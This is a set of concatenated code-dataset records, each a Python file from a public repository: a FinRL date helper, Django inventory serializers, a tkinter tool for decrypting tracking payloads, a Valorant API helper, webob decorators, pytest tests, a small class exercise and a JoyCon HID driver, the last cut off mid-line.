= int\n\n candle_to_no_minutes = {'1m': 1, '5m': 5, '10m': 10, '30m': 30, '1h': 60, '2h': 2*60, '4h': 4*60, '12h': 12*60}\n no_minutes = candle_to_no_minutes[candlewidth]\n\n trade_start_date_datetimeObj = datetime.strptime(trade_start_date, \"%Y-%m-%d %H:%M:%S\")\n\n # train start date = trade_start_date - (no_c_t + no_c_v)\n train_start_date = (trade_start_date_datetimeObj\n - timedelta(minutes=no_minutes * (no_candles_for_train\n + no_candles_for_val))).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # train start date = trade_start_date - (no_c_v + 1)\n train_end_date = (trade_start_date_datetimeObj\n - timedelta(minutes=no_minutes * (no_candles_for_val + 1))).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # validation start date = trade_start_date - no_c_v\n val_start_date = (trade_start_date_datetimeObj\n - timedelta(minutes=no_minutes * no_candles_for_val)).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # validation start date = trade_start_date - 1\n val_end_date = (trade_start_date_datetimeObj\n - timedelta(minutes=no_minutes * 1)).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n return train_start_date, train_end_date, val_start_date, val_end_date\n\n\nTRAIN_START_DATE, TRAIN_END_DATE, VAL_START_DATE, VAL_END_DATE = calculate_start_end_dates(TIMEFRAME)\nprint(\"TRAIN_START_DATE: \", TRAIN_START_DATE)\nprint(\"VAL_END_DATE: \", VAL_END_DATE)\n","repo_name":"Burntt/FinRL_Crypto","sub_path":"config_main.py","file_name":"config_main.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"63"} +{"seq_id":"1747538550","text":"from django.db.models import F\nfrom rest_framework import serializers\n\nfrom care.facility.api.serializers import TIMESTAMP_FIELDS\nfrom care.facility.models import (\n ROOM_TYPES,\n FacilityInventoryItem,\n FacilityInventoryItemTag,\n FacilityInventoryLog,\n FacilityInventorySummary,\n FacilityInventoryUnit,\n FacilityInventoryUnitConverter,\n FacilityInventoryMinQuantity,\n)\n\nfrom config.serializers import ChoiceField\n\n\nclass FacilityInventoryItemTagSerializer(serializers.ModelSerializer):\n class Meta:\n model = FacilityInventoryItemTag\n read_only_fields = (\"id\",)\n fields = \"__all__\"\n\n\nclass FacilityInventoryUnitSerializer(serializers.ModelSerializer):\n class Meta:\n model = FacilityInventoryUnit\n read_only_fields = (\"id\",)\n fields = \"__all__\"\n\n\nclass FacilityInventoryItemSerializer(serializers.ModelSerializer):\n default_unit = FacilityInventoryUnitSerializer()\n allowed_units = FacilityInventoryUnitSerializer(many=True)\n tags = FacilityInventoryItemTagSerializer(many=True)\n\n class Meta:\n model = FacilityInventoryItem\n read_only_fields = (\"id\",)\n fields = \"__all__\"\n\n\nclass FacilityInventoryLogSerializer(serializers.ModelSerializer):\n\n id = serializers.UUIDField(source=\"external_id\", read_only=True)\n\n item_object = FacilityInventoryItemSerializer(source=\"item\", required=False)\n unit_object = FacilityInventoryUnitSerializer(source=\"unit\", required=False)\n\n class Meta:\n model = FacilityInventoryLog\n read_only_fields = (\"id\", \"external_id\", \"created_by\")\n exclude = (\n \"deleted\",\n \"modified_date\",\n \"facility\",\n )\n\n def create(self, validated_data):\n\n item = validated_data[\"item\"]\n unit = validated_data[\"unit\"]\n\n try:\n item.allowed_units.get(id=unit.id)\n except:\n raise serializers.ValidationError({\"unit\": [f\"Item cannot be measured with unit\"]})\n\n multiplier = 1\n\n try:\n if item.default_unit != unit:\n multiplier = FacilityInventoryUnitConverter.objects.get(\n from_unit=unit, to_unit=item.default_unit\n ).multiplier\n except:\n raise serializers.ValidationError({\"item\": [f\"Please Ask Admin to Add Conversion Metrics\"]})\n\n validated_data[\"created_by\"] = self.context[\"request\"].user\n\n if not validated_data[\"is_incoming\"]:\n multiplier *= -1\n\n summary_obj = None\n current_min_quantity = item.min_quantity\n current_quantity = multiplier * validated_data[\"quantity\"]\n try:\n summary_obj = FacilityInventorySummary.objects.get(facility=validated_data[\"facility\"], item=item)\n current_quantity = summary_obj.quantity + (multiplier * validated_data[\"quantity\"])\n summary_obj.quantity = F(\"quantity\") + (multiplier * validated_data[\"quantity\"])\n except:\n summary_obj = FacilityInventorySummary(\n facility=validated_data[\"facility\"], item=item, quantity=multiplier * validated_data[\"quantity\"]\n )\n\n try:\n current_min_quantity = FacilityInventoryMinQuantity.objects.get(\n facility=validated_data[\"facility\"], item=item\n ).min_quantity\n except:\n pass\n\n summary_obj.is_low = current_quantity < current_min_quantity\n\n instance = super().create(validated_data)\n summary_obj.save()\n\n return instance\n\n\nclass FacilityInventorySummarySerializer(serializers.ModelSerializer):\n id = serializers.UUIDField(source=\"external_id\", read_only=True)\n\n item_object = FacilityInventoryItemSerializer(source=\"item\", required=False)\n unit_object = FacilityInventoryUnitSerializer(source=\"unit\", required=False)\n\n class Meta:\n model = FacilityInventorySummary\n read_only_fields = (\"id\", \"item\", \"unit\")\n exclude = (\n \"external_id\",\n \"deleted\",\n \"modified_date\",\n \"facility\",\n )\n\n\nclass FacilityInventoryMinQuantitySerializer(serializers.ModelSerializer):\n id = serializers.UUIDField(source=\"external_id\", read_only=True)\n\n item_object = FacilityInventoryItemSerializer(source=\"item\", required=False)\n\n class Meta:\n model = FacilityInventoryMinQuantity\n read_only_fields = (\"id\", \"unit\")\n exclude = (\n \"external_id\",\n \"deleted\",\n \"modified_date\",\n \"facility\",\n )\n\n def create(self, validated_data):\n item = validated_data[\"item\"]\n\n if not item:\n raise serializers.ValidationError({\"item\": [f\"Item cannot be Null\"]})\n\n try:\n instance = super().create(validated_data)\n except:\n raise serializers.ValidationError({\"item\": [f\"Item min quantity already set\"]})\n\n try:\n summary_obj = FacilityInventorySummary.objects.get(facility=validated_data[\"facility\"], item=item)\n summary_obj.is_low = summary_obj.quantity < validated_data[\"min_quantity\"]\n summary_obj.save()\n except:\n pass\n\n return instance\n\n def update(self, instance, validated_data):\n\n if \"item\" in validated_data:\n if instance.item != validated_data[\"item\"]:\n raise serializers.ValidationError({\"item\": [f\"Item cannot be Changed\"]})\n\n item = validated_data[\"item\"]\n\n try:\n summary_obj = FacilityInventorySummary.objects.get(facility=instance.facility, item=item)\n summary_obj.is_low = summary_obj.quantity < validated_data[\"min_quantity\"]\n summary_obj.save()\n except:\n pass\n\n return super().update(instance, validated_data)\n","repo_name":"ajmalhassan/care","sub_path":"care/facility/api/serializers/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"10377986672","text":"#coding:utf-8\nimport json\nimport tkinter\nfrom tkinter import *\nimport time\nfrom codes.decrypt import aesDecrypt\n\nLOG_LINE_NUM = 0\nDECTYPT_PASSWD = 'neteasemobiledat'\n\nclass decrypt_frame(object):\n def __init__(self,init_tk_object):\n self.init_tk_object = init_tk_object\n self.init_tk_object.resizable(0,0)\n screen_width_x = str(int(self.init_tk_object.winfo_screenwidth()/2) - 500)\n screen_height_y = str(int(self.init_tk_object.winfo_screenheight()/2) - 300)\n screen_inti_str = r'1024x670' + r'+' + screen_width_x + r'+' + screen_height_y\n self.init_tk_object.geometry(screen_inti_str)\n self.init_tk_object.title('银河埋点抓拆包工具')\n # self.init_tk_object['bg'] = 'DEEPSKYBLUE'\n # self.init_tk_object.attributes('-alpha',0.618) #虚化\n #标签\n self.init_data_label = Label(self.init_tk_object, text='待解密数据',font=('楷体',10, 'bold'))\n self.init_data_label.grid(row=0, column=0)\n self.result_data_label = Label(self.init_tk_object, text='解密结果',font=('楷体',10, 'bold'))\n self.result_data_label.grid(row=0, column=12)\n self.log_label = Label(self.init_tk_object, text='日志',font=('楷体',10, 'bold'))\n self.log_label.grid(row=12, column=0)\n #文本框\n self.init_data_Text = Text(self.init_tk_object, width=67, height=35) #原始数据录入框\n self.init_data_Text.grid(row=1, column=0, rowspan=10, columnspan=10)\n self.result_data_Text = Text(self.init_tk_object, width=70, height=49) #处理结果展示\n self.result_data_Text.grid(row=1, column=12, rowspan=15, columnspan=10)\n self.log_data_Text = Text(self.init_tk_object, width=66, height=9) # 日志框\n self.log_data_Text.grid(row=13, column=0, columnspan=10)\n #按钮\n self.aes_trans_to_str_button = Button(self.init_tk_object, text='解密', bg='lightblue',font=('楷体',15, 'bold'), width=10,command=self.aes_trans_to_str) # 调用内部方法 加()为直接调用\n self.aes_trans_to_str_button.grid(row=1, column=11)\n #返回代理frame 按钮事件\n def show_root_window(self):\n self.init_tk_object.update()\n self.init_tk_object.deiconify()\n def close_other_frame(self, frame):\n # self.init_tk_object.destroy\n # frame.destroy()\n self.show_root_window()\n #功能函数\n def aes_trans_to_str(self):\n aes_string = str(self.init_data_Text.get(1.0,END)).replace(' ','').encode('utf8')\n if aes_string:\n try:\n decrypt_res = aesDecrypt(DECTYPT_PASSWD, aes_string)\n if '{' not in decrypt_res:\n print()\n else:\n middle_json = json.loads(decrypt_res)\n decrypt_res = json.dumps(middle_json, sort_keys=True, indent=2,ensure_ascii=False)\n #输出到界面\n self.result_data_Text.delete(1.0,END) #清空内容\n self.result_data_Text.insert(1.0,decrypt_res)\n self.write_log_to_Text('INFO:aes_trans_to_str success')\n except:\n self.result_data_Text.delete(1.0,END)\n self.result_data_Text.insert(1.0,'字符串解密失败')\n else:\n self.write_log_to_Text('ERROR:aes_trans_to_str failed')\n\n #获取当前时间\n def get_current_time(self):\n current_time = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))\n return current_time\n\n #日志动态打印\n def write_log_to_Text(self,logmsg):\n global LOG_LINE_NUM\n current_time = self.get_current_time()\n logmsg_in = str(current_time) +' ' + str(logmsg) + '\\n'\n if LOG_LINE_NUM <= 7:\n self.log_data_Text.insert(END, logmsg_in)\n LOG_LINE_NUM = LOG_LINE_NUM + 1\n else:\n self.log_data_Text.delete(1.0,2.0)\n self.log_data_Text.insert(END, logmsg_in)\n# init_window = tkinter.Tk()\n# decrypt_frame_ = decrypt_frame(init_window)\n# init_window.mainloop()","repo_name":"BigdataZjk/ProxyServer","sub_path":"src/gui_codes/decrypt_frame.py","file_name":"decrypt_frame.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71062767561","text":"import time\n\n\nclass Coregame:\n def __init__(self, Requests, log):\n self.log = log\n\n self.Requests = Requests\n\n self.response = \"\"\n\n def get_coregame_match_id(self):\n try:\n self.response = self.Requests.fetch(url_type=\"glz\",\n endpoint=f\"/core-game/v1/players/{self.Requests.puuid}\",\n method=\"get\")\n if self.response.get(\"errorCode\") == \"RESOURCE_NOT_FOUND\":\n return 0\n match_id = self.response['MatchID']\n self.log(f\"retrieved coregame match id: '{match_id}'\")\n return match_id\n except (KeyError, TypeError):\n self.log(f\"cannot find coregame match id: \")\n # print(f\"No match id found. {self.response}\")\n time.sleep(5)\n try:\n self.response = self.Requests.fetch(url_type=\"glz\",\n endpoint=f\"/core-game/v1/players/{self.Requests.puuid}\",\n method=\"get\")\n match_id = self.response['MatchID']\n self.log(f\"retrieved coregame match id: '{match_id}'\")\n return match_id\n except (KeyError, TypeError):\n self.log(f\"cannot find coregame match id: \")\n print(f\"No match id found. {self.response}\")\n return 0\n\n def get_coregame_stats(self):\n self.match_id = self.get_coregame_match_id()\n if self.match_id != 0:\n return self.Requests.fetch(url_type=\"glz\",\n endpoint=f\"/core-game/v1/matches/{self.match_id}\",\n method=\"get\")\n else:\n return None\n\n def get_current_map(self, map_urls, map_splashes) -> dict:\n \"\"\"\n Abstracts get_coregame_stats() to get the current map name and splash.\n :return: Dictionary of appropriate name and splash.\n \"\"\"\n coregame_stats = self.get_coregame_stats()\n\n if coregame_stats is None:\n return 'N/A'\n\n current_map = map_urls.get(coregame_stats['MapID'].lower())\n return {'name': current_map, 'splash': map_splashes[current_map]}\n","repo_name":"zayKenyon/VALORANT-rank-yoinker","sub_path":"src/states/coregame.py","file_name":"coregame.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":384,"dataset":"github-code","pt":"63"} +{"seq_id":"7240166318","text":"from webob import Request, Response\nfrom webob import exc\n\ndef controller(func):\n def _wrapper(environ, start_response):\n req = Request(environ)\n try:\n resp = func(req, **req.urlvars)\n except exc.HTTPException as e:\n resp = e\n if isinstance(resp, basestring):\n resp = Response(body=resp)\n return resp(environ, start_response)\n return _wrapper\n\ndef rest_controller(cls):\n def _wrapper(environ, start_response):\n req = Request(environ)\n try:\n controller = cls(req)\n action = req.urlvars.get('action')\n if action:\n action += '_' + req.method.lower()\n else:\n action = req.method.lower()\n try:\n method = getattr(controller, action)\n except AttributeError:\n raise exc.HTTPNotFound('No action %s' % action)\n resp = method(req, **req.urlvars)\n except exc.HTTPException as e:\n resp = e\n if not isinstance(resp, Response):\n resp = Response(body=unicode(resp))\n return resp(environ, start_response)\n return _wrapper\n","repo_name":"samsong8610/diyframework","sub_path":"diyfx/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6902654628","text":"# -*- coding: utf-8 -*-\n\n# #!/usr/bin/python\n#\n# nl_lib Testing\n#\n__author__ = u'morrj140'\n__VERSION__ = u'0.2'\n\nfrom Logger import *\nlogger = setupLogging(__name__)\nlogger.setLevel(INFO)\n\nimport pytest\nfrom test_Constants import *\n\nfrom Concepts import Concepts\n\n@pytest.fixture(scope=u\"module\")\ndef cleandir():\n cwd = os.getcwd()\n\n listFiles = list()\n listFiles.append(exportFileTest)\n\n for lf in listFiles:\n ftr = cwd + os.sep + u\"test\" + os.sep + lf\n\n if os.path.exists(ftr):\n logger.info(u\"remove : %s\" % ftr)\n os.remove(ftr)\n\n\ndef setup():\n key = u\"key\"\n value = u\"value\"\n\n c = Concepts(key, value)\n assert (c.name == key)\n assert (c.typeName == value)\n\n d = c.addConceptKeyType(key, value)\n assert (c.count == 1)\n assert (d.name == key)\n assert (d.typeName == value)\n\n e = d.addConceptKeyType(key, value)\n assert (d.count == 1)\n assert (e.name == key)\n assert (e.typeName == value)\n\n e = d.addConceptKeyType(key, value)\n assert (e.count == 0)\n\n return key, value, c\n\n@pytest.mark.Concepts\ndef test_Concepts(cleandir):\n logger.info(\"%s\" % __name__)\n\n key, value, c = setup()\n\n logger.info(u\"Using : %s\" % exportFileTest)\n\n Concepts.saveConcepts(c, exportFileTest)\n\n assert (os.path.isfile(exportFileTest))\n\n@pytest.mark.Concepts\ndef test_Concepts_Props(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n d = dict()\n d[key] = value\n\n c.setProperties(d)\n\n nd = c.getProperties()\n\n assert(nd[key] == value)\n\n@pytest.mark.Concepts\ndef test_concepts_dict(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n d = c.dictChildrenType(value)\n\n assert(d is not None)\n assert(len(d) > 0)\n assert(len(d) == 1)\n\n@pytest.mark.Concepts\ndef test_sorted_concepts(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n sc = c.sortConcepts(value)\n\n assert(sc is not None)\n assert(isinstance(sc, list))\n assert(len(sc) > 0)\n assert(len(sc) == 1)\n\n@pytest.mark.Concepts\ndef test_listCSVConcepts(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n sc = c.listCSVConcepts()\n\n assert(sc is not None)\n assert(isinstance(sc, list))\n assert(len(sc) > 0)\n assert(len(sc) == 3)\n\n@pytest.mark.Concepts\ndef test_addConcept(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n dkey = u\"nd\"\n dvalue = u\"ndt\"\n\n d = Concepts(dkey, dvalue)\n\n c.addConcept(d)\n cd = c.getConcepts()\n ck = c.getConcepts().keys()\n cv = c.getConcepts().values()\n\n assert(cv is not None)\n assert(isinstance(cv, list))\n assert(d.name == cd[dkey].name)\n assert(d.count == cd[dkey].count)\n\n@pytest.mark.Concepts\ndef test_addListConcepts(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n listConcepts = list()\n listConcepts.append(Concepts(u\"a\", u\"b\"))\n listConcepts.append(Concepts(u\"c\", u\"d\"))\n listConcepts.append(Concepts(u\"e\", u\"f\"))\n\n c.addListConcepts(listConcepts)\n\n cd = c.getConcepts()\n\n assert(cd is not None)\n assert(len(cd) > 0)\n assert(len(cd) == 4)\n\n\n@pytest.mark.Concepts\ndef test_clean_concepts(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n assert (c is not None)\n\n c.logConcepts()\n\n assert(c is not None)\n\n c.logConcepts()\n\nif __name__ == u\"__main__\":\n clean_dir = os.getcwd()\n test_Concepts(clean_dir)\n test_clean_concepts(cleandir)\n test_addListConcepts(cleandir)\n test_addListConcepts(cleandir)\n test_sorted_concepts(cleandir)\n test_concepts_dict(cleandir)\n test_Concepts_Props(cleandir)","repo_name":"Darth-Neo/nl_lib","sub_path":"nl_lib/test_Concepts.py","file_name":"test_Concepts.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"74173155399","text":"class celular: \n marca = \"\"\n color = \"\"\n modelo = \"\"\n prendido = False \n volumen = 0\n\n\n def __init__(self, marca, color, modelo):\n self. marca = marca\n self. color = color\n self. modelo = modelo\n\n def prender (self):\n self.prendido = True \n\n def set_volumen(self, volumen):\n self.volumen = volumen \n\n\ncelular1 = celular(\"samsung\",\"negro\", \"galaxy s21 ultra\")\ncelular1.color = \"blanco\"\ncelular1.prender ()\ncelular1.set_volumen(10) \nprint(f'marca: {celular1.marca}, color: {celular1.color}, modelo: {celular1.modelo}')\n\nif celular1.prendido:\n print(f'el celular esta prendido y su volumen es {celular1.volumen}')\n celular1.set_volumen(8) \n print(f'el celular esta prendido y su volumen es {celular1.volumen}')\nelse:\n print ('el celular esta apagado')\n\n","repo_name":"FedeDiStefano/Python","sub_path":"Curso de Python/curso de principiante/celulares/objetos.py","file_name":"objetos.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"40461031475","text":"import time\nfrom threading import Thread\nfrom typing import Optional, Tuple\n\nimport hid\n\nfrom .constants import (JOYCON_L_PRODUCT_ID, JOYCON_PRODUCT_IDS,\n JOYCON_R_PRODUCT_ID, JOYCON_VENDOR_ID)\n\n# TODO: disconnect, power off sequence\n\n\nclass JoyCon:\n _INPUT_REPORT_SIZE = 49\n _INPUT_REPORT_PERIOD = 0.015\n _RUMBLE_DATA = b'\\x00\\x01\\x40\\x40\\x00\\x01\\x40\\x40'\n\n vendor_id: int\n product_id: int\n serial: Optional[str]\n simple_mode: bool\n color_body: Tuple[int, int, int]\n color_btn: Tuple[int, int, int]\n stick_cal: Tuple[int, int, int, int, int, int, int, int]\n\n def __init__(self, vendor_id: int, product_id: int, serial: str = None, simple_mode=False):\n if vendor_id != JOYCON_VENDOR_ID:\n raise ValueError(f'vendor_id is invalid: {vendor_id!r}')\n\n if product_id not in JOYCON_PRODUCT_IDS:\n raise ValueError(f'product_id is invalid: {product_id!r}')\n\n self.vendor_id = vendor_id\n self.product_id = product_id\n self.serial = serial\n self.simple_mode = simple_mode # TODO: It's for reporting mode 0x3f\n\n # setup internal state\n self._input_hooks = []\n self._input_report = bytes(self._INPUT_REPORT_SIZE)\n self._packet_number = 0\n self.set_accel_calibration((0, 0, 0), (1, 1, 1))\n\n # connect to joycon\n self._joycon_device = self._open(vendor_id, product_id, serial=serial)\n self._read_joycon_data()\n self._setup_sensors()\n\n # start talking with the joycon in a daemon thread\n Thread(target=self._update_input_report, daemon=True).start()\n\n def _open(self, vendor_id, product_id, serial):\n try:\n if hasattr(hid, \"device\"): # hidapi\n _joycon_device = hid.device()\n _joycon_device.open(vendor_id, product_id, serial)\n elif hasattr(hid, \"Device\"): # hid\n _joycon_device = hid.Device(vendor_id, product_id, serial)\n else:\n raise Exception(\"Implementation of hid is not recognized!\")\n except IOError as e:\n raise IOError('joycon connect failed') from e\n return _joycon_device\n\n def _close(self):\n if self._joycon_device:\n self._joycon_device.close()\n self._joycon_device = None\n\n def _read_input_report(self) -> bytes:\n if self._joycon_device:\n return bytes(self._joycon_device.read(self._INPUT_REPORT_SIZE))\n\n def _write_output_report(self, command, subcommand, argument):\n if not self._joycon_device:\n return\n\n # TODO: add documentation\n self._joycon_device.write(b''.join([\n command,\n self._packet_number.to_bytes(1, byteorder='little'),\n self._RUMBLE_DATA,\n subcommand,\n argument,\n ]))\n self._packet_number = (self._packet_number + 1) & 0xF\n\n def _send_subcmd_get_response(self, subcommand, argument) -> Tuple[bool, bytes]:\n # TODO: handle subcmd when daemon is running\n self._write_output_report(b'\\x01', subcommand, argument)\n\n report = [0]\n while report[0] != 0x21: # TODO, avoid this, await daemon instead\n report = self._read_input_report()\n\n # TODO, remove, see the todo above\n assert report[1:2] != subcommand, \"THREAD carefully\"\n\n # TODO: determine if the cut bytes are worth anything\n\n return report[13] & 0x80, report[13:] # (ack, data)\n\n def _spi_flash_read(self, address, size) -> bytes:\n assert size <= 0x1d\n argument = address.to_bytes(4, \"little\") + size.to_bytes(1, \"little\")\n ack, report = self._send_subcmd_get_response(b'\\x10', argument)\n if not ack:\n raise IOError(\"After SPI read @ {address:#06x}: got NACK\")\n\n if report[:2] != b'\\x90\\x10':\n raise IOError(\"Something else than the expected ACK was recieved!\")\n assert report[2:7] == argument, (report[2:5], argument)\n\n return report[7:size + 7]\n\n def _update_input_report(self): # daemon thread\n try:\n while self._joycon_device:\n report = [0]\n # TODO, handle input reports of type 0x21 and 0x3f\n while report[0] != 0x30:\n report = self._read_input_report()\n\n self._input_report = report\n\n # Call input hooks in a different thread\n Thread(target=self._input_hook_caller, daemon=True).start()\n except OSError:\n print('connection closed')\n pass\n\n def _input_hook_caller(self):\n for callback in self._input_hooks:\n callback(self)\n\n def _read_joycon_data(self):\n color_data = self._spi_flash_read(0x6050, 6)\n self.color_body = tuple(color_data[:3])\n self.color_btn = tuple(color_data[3:])\n\n self._read_stick_calibration_data()\n\n buf = self._spi_flash_read(0x6086 if self.is_left() else 0x6098, 16)\n self.deadzone = (buf[4] << 8) & 0xF00 | buf[3]\n\n # user IME data\n if self._spi_flash_read(0x8026, 2) == b\"\\xB2\\xA1\":\n # print(f\"Calibrate {self.serial} IME with user data\")\n imu_cal = self._spi_flash_read(0x8028, 24)\n\n # factory IME data\n else:\n # print(f\"Calibrate {self.serial} IME with factory data\")\n imu_cal = self._spi_flash_read(0x6020, 24)\n\n self.set_accel_calibration((\n self._to_int16le_from_2bytes(imu_cal[0], imu_cal[1]),\n self._to_int16le_from_2bytes(imu_cal[2], imu_cal[3]),\n self._to_int16le_from_2bytes(imu_cal[4], imu_cal[5]),\n ), (\n self._to_int16le_from_2bytes(imu_cal[6], imu_cal[7]),\n self._to_int16le_from_2bytes(imu_cal[8], imu_cal[9]),\n self._to_int16le_from_2bytes(imu_cal[10], imu_cal[11]),\n ))\n\n def _read_stick_calibration_data(self):\n user_stick_cal_addr = 0x8012 if self.is_left() else 0x801D\n buf = self._spi_flash_read(user_stick_cal_addr, 9)\n use_user_data = False\n\n for b in buf:\n if b != 0xFF:\n use_user_data = True\n break\n\n if not use_user_data:\n factory_stick_cal_addr = 0x603D if self.is_left() else 0x6046\n buf = self._spi_flash_read(factory_stick_cal_addr, 9)\n\n self.stick_cal = [0] * 6\n\n # X Axis Max above center\n self.stick_cal[0 if self.is_left() else 2] = (buf[1] << 8) & 0xF00 | buf[0]\n # Y Axis Max above center\n self.stick_cal[1 if self.is_left() else 3] = (buf[2] << 4) | (buf[1] >> 4)\n # X Axis Center\n self.stick_cal[2 if self.is_left() else 4] = (buf[4] << 8) & 0xF00 | buf[3]\n # Y Axis Center\n self.stick_cal[3 if self.is_left() else 5] = (buf[5] << 4) | (buf[4] >> 4)\n # X Axis Min below center\n self.stick_cal[4 if self.is_left() else 0] = (buf[7] << 8) & 0xF00 | buf[6]\n # Y Axis Min below center\n self.stick_cal[5 if self.is_left() else 1] = (buf[8] << 4) | (buf[7] >> 4)\n\n def _setup_sensors(self):\n # Enable 6 axis sensors\n self._write_output_report(b'\\x01', b'\\x40', b'\\x01')\n # It needs delta time to update the setting\n time.sleep(0.02)\n # Change format of input report\n self._write_output_report(b'\\x01', b'\\x03', b'\\x30')\n\n @staticmethod\n def _to_int16le_from_2bytes(hbytebe, lbytebe):\n uint16le = (lbytebe << 8) | hbytebe\n int16le = uint16le if uint16le < 32768 else uint16le - 65536\n return int16le\n\n def _get_nbit_from_input_report(self, offset_byte, offset_bit, nbit):\n byte = self._input_report[offset_byte]\n return (byte >> offset_bit) & ((1 << nbit) - 1)\n\n def __del__(self):\n self._close()\n\n def set_accel_calibration(self, offset_xyz=None, coeff_xyz=None):\n if offset_xyz and coeff_xyz:\n self._ACCEL_OFFSET_X, self._ACCEL_OFFSET_Y, self._ACCEL_OFFSET_Z = offset_xyz\n\n cx, cy, cz = coeff_xyz\n self._ACCEL_COEFF_X = (1.0 / (cx - self._ACCEL_OFFSET_X)) * 4.0\n self._ACCEL_COEFF_Y = (1.0 / (cy - self._ACCEL_OFFSET_Y)) * 4.0\n self._ACCEL_COEFF_Z = (1.0 / (cz - self._ACCEL_OFFSET_Z)) * 4.0\n\n def get_actual_stick_value(self, pre_cal, orientation): # X/Horizontal = 0, Y/Vertical = 1\n diff = pre_cal - self.stick_cal[2 + orientation]\n if (abs(diff) < self.deadzone):\n return 0\n elif diff > 0: # Axis is above center\n return diff / self.stick_cal[orientation]\n else:\n return diff / self.stick_cal[4 + orientation]\n\n def register_update_hook(self, callback):\n self._input_hooks.append(callback)\n return callback # this makes it so you could use it as a decorator\n\n def is_left(self):\n return self.product_id == JOYCON_L_PRODUCT_ID\n\n def is_right(self):\n return self.product_id == JOYCON_R_PRODUCT_ID\n\n def get_battery_charging(self):\n return self._get_nbit_from_input_report(2, 4, 1)\n\n def get_battery_level(self):\n return self._get_nbit_from_input_report(2, 5, 3)\n\n def get_button_y(self):\n return self._get_nbit_from_input_report(3, 0, 1)\n\n def get_button_x(self):\n return self._get_nbit_from_input_report(3, 1, 1)\n\n def get_button_b(self):\n return self._get_nbit_from_input_report(3, 2, 1)\n\n def get_button_a(self):\n return self._get_nbit_from_input_report(3, 3, 1)\n\n def get_button_right_sr(self):\n return self._get_nbit_from_input_report(3, 4, 1)\n\n def get_button_right_sl(self):\n return self._get_nbit_from_input_report(3, 5, 1)\n\n def get_button_r(self):\n return self._get_nbit_from_input_report(3, 6, 1)\n\n def get_button_zr(self):\n return self._get_nbit_from_input_report(3, 7, 1)\n\n def get_button_minus(self):\n return self._get_nbit_from_input_report(4, 0, 1)\n\n def get_button_plus(self):\n return self._get_nbit_from_input_report(4, 1, 1)\n\n def get_button_r_stick(self):\n return self._get_nbit_from_input_report(4, 2, 1)\n\n def get_button_l_stick(self):\n return self._get_nbit_from_input_report(4, 3, 1)\n\n def get_button_home(self):\n return self._get_nbit_from_input_report(4, 4, 1)\n\n def get_button_capture(self):\n return self._get_nbit_from_input_report(4, 5, 1)\n\n def get_button_charging_grip(self):\n return self._get_nbit_from_input_report(4, 7, 1)\n\n def get_button_down(self):\n return self._get_nbit_from_input_report(5, 0, 1)\n\n def get_button_up(self):\n return self._get_nbit_from_input_report(5, 1, 1)\n\n def get_button_right(self):\n return self._get_nbit_from_input_report(5, 2, 1)\n\n def get_button_left(self):\n return self._get_nbit_from_input_report(5, 3, 1)\n\n def get_button_left_sr(self):\n return self._get_nbit_from_input_report(5, 4, 1)\n\n def get_button_left_sl(self):\n return self._get_nbit_from_input_report(5, 5, 1)\n\n def get_button_l(self):\n return self._get_nbit_from_input_report(5, 6, 1)\n\n def get_button_zl(self):\n return self._get_nbit_from_input_report(5, 7, 1)\n\n def get_stick_left_horizontal(self):\n if not self.is_left():\n return 0\n\n pre_cal = self._get_nbit_from_input_report(6, 0, 8) \\\n | (self._get_nbit_from_input_report(7, 0, 4) << 8)\n return self.get_actual_stick_value(pre_cal, 0)\n\n def get_stick_left_vertical(self):\n if not self.is_left():\n return 0\n\n pre_cal = self._get_nbit_from_input_report(7, 4, 4) \\\n | (self._get_nbit_from_input_report(8, 0, 8) << 4)\n return self.get_actual_stick_value(pre_cal, 1)\n\n def get_stick_right_horizontal(self):\n if self.is_left():\n return 0\n\n pre_cal = self._get_nbit_from_input_report(9, 0, 8) \\\n | (self._get_nbit_from_input_report(10, 0, 4) << 8)\n return self.get_actual_stick_value(pre_cal, 0)\n\n def get_stick_right_vertical(self):\n if self.is_left():\n return 0\n\n pre_cal = self._get_nbit_from_input_report(10, 4, 4) \\\n | (self._get_nbit_from_input_report(11, 0, 8) << 4)\n return self.get_actual_stick_value(pre_cal, 1)\n\n def get_accels(self):\n input_report = bytes(self._input_report)\n accels = []\n\n for idx in range(3):\n x = self.get_accel_x(input_report, sample_idx=idx)\n y = self.get_accel_y(input_report, sample_idx=idx)\n z = self.get_accel_z(input_report, sample_idx=idx)\n accels.append((x, y, z))\n\n return accels\n\n def get_accel_x(self, input_report=None, sample_idx=0):\n if not input_report:\n input_report = self._input_report\n\n if sample_idx not in (0, 1, 2):\n raise IndexError('sample_idx should be between 0 and 2')\n data = self._to_int16le_from_2bytes(\n input_report[13 + sample_idx * 12],\n input_report[14 + sample_idx * 12])\n return data * self._ACCEL_COEFF_X\n\n def get_accel_y(self, input_report=None, sample_idx=0):\n if not input_report:\n input_report = self._input_report\n\n if sample_idx not in (0, 1, 2):\n raise 